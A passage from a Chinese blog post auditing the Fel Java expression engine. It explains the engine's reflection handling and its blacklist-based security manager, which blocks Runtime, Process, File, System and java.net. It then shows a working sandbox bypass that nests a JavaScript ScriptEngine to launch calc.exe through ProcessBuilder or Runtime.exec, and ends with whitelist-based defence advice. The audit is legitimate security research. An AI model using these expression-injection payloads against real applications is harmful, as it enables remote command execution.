<li><strong>节点解释</strong>：每种节点（常量、变量、函数）都有对应的解释器负责解释该节点</li>
<li><strong>语法树执行顺序</strong>：按先序遍历执行（根<span class="katex"><span class="katex-mathml"><math><semantics><mrow><mo>→</mo></mrow><annotation encoding="application/x-tex">\rightarrow</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">→</span></span></span></span>左<span class="katex"><span class="katex-mathml"><math><semantics><mrow><mo>→</mo></mrow><annotation encoding="application/x-tex">\rightarrow</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.36687em;vertical-align:0em;"></span><span class="mrel">→</span></span></span></span>右）</li>
</ol>
<p><img src="/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image3.png" alt="image" /></p>
<h3 id="获取class创建对象"><a class="markdownIt-Anchor" href="#获取class创建对象"></a> 获取class/创建对象</h3>
<ul>
<li>
<p>Fel中使用‘$’来获取class或创建对象</p>
<ul>
<li>
<p><strong>获取class</strong>：<code>$(‘Runtime’)</code>结果为<code>java.lang.Runtime</code></p>
</li>
<li>
<p>函数调用栈如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">AbstFelNode#eval</span><br><span class="line">	-&gt;FunNode#interpret</span><br><span class="line">		-&gt;Dollar#call -&gt; #isNew -&gt; #getClass -&gt; Class.forName()</span><br></pre></td></tr></table></figure>
</li>
<li>
<p><strong>创建对象</strong>：<code>$(‘test.Student.new’)</code>结果为<code>new Student()</code></p>
</li>
<li>
<p>函数调用栈如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">AbstFelNode#eval</span><br><span class="line">	-&gt;FunNode#interpret</span><br><span class="line">		-&gt;Dollar#call -&gt; #isNew -&gt; #newObject -&gt; Class.newInstance()</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li>
<p>Dollar.java部分关键代码如下</p>
</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">call</span><span class="params">(FelNode node, FelContext context)</span> </span>&#123;</span><br><span class="line">    String txt = getChildText(node);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">boolean</span> isNew = isNew(txt);</span><br><span class="line">    Class&lt;?&gt; cls = getClass(t           xt, isNew);</span><br><span class="line">    <span class="keyword">if</span> (isNew) &#123;</span><br><span class="line">        <span class="keyword">return</span> newObject(cls);</span><br><span class="line"></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> cls;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 通过forName反射获取class或创建对象</span></span><br><span class="line"><span class="comment">// suffix = .new</span></span><br><span class="line"><span class="keyword">private</span> Class&lt;?&gt; getClass(String txt, <span class="keyword">boolean</span> isNew) &#123;</span><br><span class="line">    String className = txt;</span><br><span class="line">    <span class="keyword">if</span> (isNew) &#123;</span><br><span class="line">        className = className.substring(<span class="number">0</span>, txt.length() - suffix.length());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (className.indexOf(<span class="string">&quot;.&quot;</span>) == -<span class="number">1</span>) &#123;</span><br><span class="line">        className = <span class="string">&quot;java.lang.&quot;</span> + className;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        Class&lt;?&gt; clz = Class.forName(className);</span><br><span class="line">        <span class="keyword">return</span> clz;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException e) &#123;</span><br><span class="line">        e.printStackTrace();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// new一个实例化对象</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> Object <span class="title">newObject</span><span class="params">(Class&lt;?&gt; cls)</span> </span>&#123;</span><br><span class="line">    Object o = <span class="keyword">null</span>;</span><br><span class="line">    <span class="keyword">if</span> (cls != <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            o = cls.newInstance();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (InstantiationException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IllegalAccessException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> o;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 判断是否为new创建对象</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">boolean</span> <span class="title">isNew</span><span class="params">(String txt)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">boolean</span> isNew = txt.endsWith(suffix);</span><br><span class="line">    <span class="keyword">return</span> isNew;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="获取方法"><a class="markdownIt-Anchor" href="#获取方法"></a> 获取方法</h3>
<ul>
<li>Fel中通过点运算符获取方法</li>
<li>函数调用栈如下</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Dot#call -&gt; #findMethod</span><br><span class="line">	-&gt;ReflectUtil#findMethod -&gt; Class.getMethods()</span><br></pre></td></tr></table></figure>
<ul>
<li>取方法代码如下
<ol>
<li>首先使用<code>Class.getMethods()</code>方法获取Class对象的方法集合</li>
<li>然后for循环逐个比较找出方法</li>
<li>返回<code>finalMethod=public static java.lang.Runtime.getRuntime()</code></li>
<li>若方法不为空，则通过<code>Method.invoke()</code>调用方法</li>
</ol>
</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Method <span class="title">findMethod</span><span class="params">(Class&lt;?&gt; cls, String attr, Class&lt;?&gt;[] paramTypes)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (attr != <span class="keyword">null</span> &amp;&amp; !<span class="string">&quot;&quot;</span>.equals(attr)) &#123;</span><br><span class="line">        String firstUpper = String.valueOf(attr.charAt(<span class="number">0</span>)).toUpperCase() + attr.substring(<span class="number">1</span>);</span><br><span class="line">        Method[] methods = cls.getMethods();</span><br><span class="line">        Method finalMethod = <span class="keyword">null</span>;</span><br><span class="line">        String[] methodNames = <span class="keyword">new</span> String[]&#123;attr, <span class="string">&quot;get&quot;</span> + firstUpper, <span class="string">&quot;is&quot;</span> + firstUpper&#125;;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> (String methodName : methodNames) &#123;</span><br><span class="line">			finalMethod = match(methodName, paramTypes, methods);</span><br><span class="line">			<span class="keyword">if</span>(finalMethod!=<span class="keyword">null</span>)&#123;</span><br><span class="line">				<span class="keyword">break</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> finalMethod;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="安全管理器-2"><a class="markdownIt-Anchor" href="#安全管理器-2"></a> 安全管理器</h3>
<ul>
<li>安全管理器中通过黑名单<code>uncallableMap</code>+白名单<code>callableMap</code>的方法来过滤
<ul>
<li>若方法在黑名单内，则返回false，无法访问</li>
<li>若白名单为空，则返回true</li>
<li>若方法在白名单内，返回true</li>
</ul>
</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">isCallable</span><span class="params">(Method m)</span> </span>&#123;</span><br><span class="line">   String method = getSignature(m);</span><br><span class="line">   <span class="keyword">if</span> (isMatch(uncallableMap, method)) &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">if</span> (callableMap.isEmpty()) &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="keyword">return</span> isMatch(callableMap, method);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 判断input是否在Map m中</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">boolean</span> <span class="title">isMatch</span><span class="params">(Map&lt;String, Pattern&gt; m, String input)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">for</span> (Map.Entry&lt;String, Pattern&gt; entry : m.entrySet()) &#123;</span><br><span class="line">        <span class="keyword">if</span> (entry.getValue().matcher(input).find()) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ul>
<li>跟踪数据流，可发现黑名单如下
<ul>
<li><code>java.lang.Runtime.*</code></li>
<li><code>com.greenpineyu.fel.compile.*</code></li>
<li><code>java.lang.Process.*</code></li>
<li><code>java.io.File.*</code></li>
<li><code>java.net.*</code></li>
<li><code>com.greenpineyu.fel.security.*</code></li>
<li><code>java.lang.System.*</code></li>
</ul>
</li>
</ul>
<p><img src="/images/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Fel/image4.png" alt="image" /></p>
<ul>
<li>黑名单配置位置位于<code>com\greenpineyu\fel\common\FelBuilder.java</code>处</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">FelBuilder</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">	<span class="comment">/**</span></span><br><span class="line"><span class="comment">	 * 构建安全管理器</span></span><br><span class="line"><span class="comment">	 * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment">	 */</span></span><br><span class="line">	<span class="function"><span class="keyword">public</span> <span class="keyword">static</span> SecurityMgr <span class="title">newSecurityMgr</span><span class="params">()</span> </span>&#123;</span><br><span class="line">		Set&lt;String&gt; disables = <span class="keyword">new</span> HashSet&lt;String&gt;();</span><br><span class="line">		disables.add(System.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">		disables.add(Runtime.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">		disables.add(Process.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">		disables.add(File.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">		disables.add(<span class="string">&quot;java.net.*&quot;</span>);</span><br><span class="line">		disables.add(<span class="string">&quot;com.greenpineyu.fel.compile.*&quot;</span>);</span><br><span class="line">		disables.add(<span class="string">&quot;com.greenpineyu.fel.security.*&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="keyword">new</span> RegexSecurityMgr(<span class="keyword">null</span>, disables);</span><br><span class="line">	&#125;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="执行系统命令"><a class="markdownIt-Anchor" href="#执行系统命令"></a> 执行系统命令</h2>
<p>Fel执行系统命令有以下几种思路，但基于引擎本身执行的方法都不成功，不知道有没有其他方法</p>
<ul>
<li>
<p>首先是<code>Runtime.getRuntime</code>，由于安全管理器的存在，这个方法在黑名单内，无法直接通过表达式解析使用，</p>
</li>
<li>
<p>由于Fel版本较老（2013年后就没有维护过），安全管理器的黑名单不够完善，没有禁用<code>ProcessBuilder</code>，可以尝试使用<code>ProcessBuilder</code>执行系统命令</p>
</li>
<li>
<p>创建恶意类使用反射</p>
</li>
<li>
<p>套娃，使用别的解析引擎来执行表达式</p>
</li>
</ul>
<h3 id="processbuilder"><a class="markdownIt-Anchor" href="#processbuilder"></a> ProcessBuilder</h3>
<ul>
<li>
<p><strong>payload</strong>：<code>felEngine.eval(&quot;$('ProcessBuilder').command(\&quot;C:/Windows/System32/calc.exe\&quot;).start()&quot;)</code></p>
</li>
<li>
<p><strong>先说结论</strong>：暂时没有发现怎样通过表达式解析执行<code>ProcessBuilder</code>，原因主要有两种情况：</p>
</li>
</ul>
<h4 id="获取class"><a class="markdownIt-Anchor" href="#获取class"></a> 获取class</h4>
<ul>
<li>
<p>Fel通过<code>$(‘ProcessBuilder’)</code>来获取<code>ProcessBuilder</code>类，而获取类使用的是<code>Class.forName()</code>，<strong>没有实例化为对象</strong></p>
</li>
<li>
<p>获取类的方法如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> Class&lt;?&gt; getClass(String txt, <span class="keyword">boolean</span> isNew) &#123;</span><br><span class="line">    String className = txt;</span><br><span class="line">    <span class="keyword">if</span> (isNew) &#123;</span><br><span class="line">        <span class="comment">// suffix=&quot;.new&quot; isNew()用于判断类需不需要实例化</span></span><br><span class="line">        className = className.substring(<span class="number">0</span>, txt.length() - suffix.length());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (className.indexOf(<span class="string">&quot;.&quot;</span>) == -<span class="number">1</span>) &#123;</span><br><span class="line">        <span class="comment">// 若$(&#x27;Class&#x27;)中没有点运算符的话，则默认为java.lang.*的工具类</span></span><br><span class="line">        className = <span class="string">&quot;java.lang.&quot;</span> + className;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        Class&lt;?&gt; clz = Class.forName(className);		<span class="comment">// 获取类</span></span><br><span class="line">        <span class="keyword">return</span> clz;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException e) &#123;</span><br><span class="line">        e.printStackTrace();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li>
<p>继续往下看，获取到<code>ProcessBuilder</code>类后，会通过<code>Class.getMethods()</code>方法获取类方法，这个没什么问题，不展开</p>
</li>
<li>
<p>有类有方法后就会执行<code>invoke()</code>通过反射去执行类的方法，但是现在问题来了</p>
<blockquote>
<p>我们知道<code>method.invoke(Object)</code>的作用是执行类或对象的方法</p>
<ul>
<li>当method是一个静态方法时，invoke()需要一个类的参数</li>
<li>当method是一个实例方法时，invoke()需要一个类对象的参数</li>
</ul>
</blockquote>
</li>
<li>
<p>很明显，<code>ProcessBuilder.command()</code>是一个实例方法，而我们的传参却是类<code>class java.lang.ProcessBuilder</code>，这就会抛出<code>object is not an instance of declaring class</code>的异常</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">invoke</span><span class="params">(Object obj, Method method, Object[] args)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> method.invoke(obj, args);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IllegalArgumentException var4) &#123;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h4 id="创建对象"><a class="markdownIt-Anchor" href="#创建对象"></a> 创建对象</h4>
<ul>
<li>前面获取类的路走不通，自然想到我们能不能自己通过表达式创建一个实例化对象</li>
<li><strong>payload：</strong><code>felEngine.eval(&quot;$('ProcessBuilder.new').command(\&quot;C:/Windows/System32/calc.exe\&quot;).start()&quot;)</code></li>
<li><code>$('ProcessBuilder.new')</code>会在上面说的执行<code>getClass()</code>方法后执行以下方法</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 传入的参数即为class java.lang.ProcessBuilder</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> Object <span class="title">newObject</span><span class="params">(Class&lt;?&gt; cls)</span> </span>&#123;</span><br><span class="line">    Object o = <span class="keyword">null</span>;</span><br><span class="line">    <span class="keyword">if</span> (cls != <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 使用newInstance()实例化</span></span><br><span class="line">            o = cls.newInstance();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (InstantiationException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IllegalAccessException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> o;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ul>
<li>
<p>这段代码咋一看没什么问题，使用<code>newInstance()</code>实例化的效果和<code>new</code>也一样，但是这两者有个很关键的不同</p>
<ul>
<li><strong><code>newInstance()</code>只能调用无参构造</strong></li>
</ul>
</li>
<li>
<p>但是**<code>ProcessBuilder</code>没有无参构造**！这就导致了执行时会抛出<code>java.lang.InstantiationException: java.lang.ProcessBuilder</code>的异常，罪魁祸首正是因为这个实例化用的是<code>newInstance()</code></p>
</li>
</ul>
<h4 id="拓展"><a class="markdownIt-Anchor" href="#拓展"></a> 拓展</h4>
<p>上面说到ProcessBuilder没有无参构造却依然可以使用<code>ProcessBuilder processBuilder = new ProcessBuilder()</code>实例化，主要是因为<code>ProcessBuilder</code>这个类有一个构造方法如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">ProcessBuilder</span><span class="params">(String... command)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.command = <span class="keyword">new</span> ArrayList&lt;&gt;(command.length);</span><br><span class="line">    <span class="keyword">for</span> (String arg : command)</span><br><span class="line">        <span class="keyword">this</span>.command.add(arg);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>它使用了<code>String... command</code>这种不定参数的形式，当我们使用<code>ProcessBuilder processBuilder = new ProcessBuilder()</code>时，其实就相当于调用了这个构造方法，只是传入的参数为空，并不是无参构造</p>
<h3 id="runtime"><a class="markdownIt-Anchor" href="#runtime"></a> Runtime</h3>
<ul>
<li>
<p>Fel有两种执行方式，一种是解释执行，即通过解析表达式来执行语句；一种是编译执行，用于海量数据的快速运算，无法执行获取类、方法等表达式</p>
</li>
<li>
<p>在解释执行中，表达式解析为java执行语句后，在<code>invoke()</code>执行方法前，会经过安全管理器检查，因此暂时没发现什么可以绕过的方法</p>
</li>
<li>
<p>安全检查的函数调用栈如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Dot.java#call -- 点运算符取方法</span><br><span class="line">    -&gt;#findMethod() -&gt;Method.getMethods()取方法</span><br><span class="line">    -&gt;#getCallableMethod() -- 调用安全管理器，若黑名单则抛出异常</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="创建恶意类"><a class="markdownIt-Anchor" href="#创建恶意类"></a> 创建恶意类</h3>
<ul>
<li>目前看来Fel只提供创建自定义类对象和调用工具类的api，并没有提供创建类的api</li>
</ul>
<h3 id="套娃"><a class="markdownIt-Anchor" href="#套娃"></a> 套娃</h3>
<ul>
<li>目前唯一一个能成功执行系统命令的方法，本质上并不是在Fel里解析执行的，而是使用了<code>javax.script.ScriptEngineManager</code>这个包</li>
<li>这个包用于js解析，它可以将js文本格式的代码封装后解析执行对应代码，由于这并没有经过Fel的解析，因此不会触发安全管理器的过滤，可以执行系统命令</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 使用ProcessBuilder执行系统命令</span></span><br><span class="line">FelEngine.instance.eval(<span class="string">&quot;$(&#x27;javax.script.ScriptEngineManager.new&#x27;).getEngineByName(&#x27;JavaScript&#x27;).eval(\&quot;var x=new java.lang.ProcessBuilder; x.command(&#x27;calc.exe&#x27;); x.start()\&quot;)&quot;</span>);</span><br><span class="line"><span class="comment">// 由于不经过Fel解析，因此Runtime也可以使用</span></span><br><span class="line">FelEngine.instance.eval(<span class="string">&quot;$(&#x27;javax.script.ScriptEngineManager.new&#x27;).getEngineByName(&#x27;JavaScript&#x27;).eval(\&quot;var x=java.lang.Runtime.getRuntime(); x.exec(&#x27;calc.exe&#x27;)\&quot;)&quot;</span>);</span><br></pre></td></tr></table></figure>
<h2 id="防御"><a class="markdownIt-Anchor" href="#防御"></a> 防御</h2>
<ul>
<li>以下为安全管理器构建源码，可以看到默认只设置了黑名单，白名单默认为空，这里可以手动添加白名单作为过滤</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// common/FelBuilder</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> SecurityMgr <span class="title">newSecurityMgr</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    Set&lt;String&gt; disables = <span class="keyword">new</span> HashSet&lt;String&gt;();</span><br><span class="line">    disables.add(System.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">    disables.add(Runtime.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">    disables.add(Process.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">    disables.add(File.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">    disables.add(<span class="string">&quot;java.net.*&quot;</span>);</span><br><span class="line">    disables.add(<span class="string">&quot;com.greenpineyu.fel.compile.*&quot;</span>);</span><br><span class="line">    disables.add(<span class="string">&quot;com.greenpineyu.fel.security.*&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">new</span> RegexSecurityMgr(<span class="keyword">null</span>, disables);			<span class="comment">// 白名单默认为空</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// security/RegexSecurityMgr</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">RegexSecurityMgr</span><span class="params">(Set&lt;String&gt; callables, Set&lt;String&gt; uncallables)</span> </span>&#123;</span><br><span class="line">    convert(callables, <span class="keyword">this</span>.callableMap);</span><br><span class="line">    convert(uncallables, <span class="keyword">this</span>.uncallableMap);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<ul>
<li>白名单添加方法</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// common/FelBuilder</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> SecurityMgr <span class="title">newSecurityMgr</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    Set&lt;String&gt; callables = <span class="keyword">new</span> HashSet&lt;String&gt;();</span><br><span class="line">    Set&lt;String&gt; disables = <span class="keyword">new</span> HashSet&lt;String&gt;();</span><br><span class="line">    callables.add(Math.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">    ...</span><br><span class="line">    disables.add(System.class.getCanonicalName() + <span class="string">&quot;.*&quot;</span>);</span><br><span class="line">    ...</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">new</span> RegexSecurityMgr(callables, disables);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="后记总结"><a class="markdownIt-Anchor" href="#后记总结"></a> 后记/总结</h2>
<p>这个引擎不知道现在应用得多不多…毕竟从2013年后就没有维护了，由于该引擎加载类的特性（比如<code>newInstance()</code>在java9后就弃用了，改为使用构造器<code>Constructor</code>中<code>getConstructor().newInstance()</code>的方法进行反射，支持有参构造），如今常见的一些依赖反射和类加载形成的表达式注入其实都做不了，可能是因为代码比较老旧的原因吧，反而使得他更“安全”；同时由于不支持创建自定义类（没有<code>loadClass()</code>、<code>ClassLoader()</code>等）的原因，也封死了加载恶意类来注入这条路；引擎本身只支持加载已有的自定义类和java工具类，对于需要实例化对象却没有无参构造的类（比如ProcessBuilder），引擎并没有给出解决方案（没想到因为他的落后而显得安全（雾））；最后就是安全管理器，黑名单应该是搞不定的，，过滤规则是：“当白名单不为空时，优先根据白名单判断，不在白名单则抛出异常，当白名单为空时，根据黑名单判断，在黑名单内则抛出异常”，因此应该还是要设白名单的吧。</p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://vvmdx.github.io/2021/08/11/2021-08-11-Fel%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="Fel代码审计" target="_blank" rel="external">https://vvmdx.github.io/2021/08/11/2021-08-11-Fel代码审计/</a>
    </li>
    
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
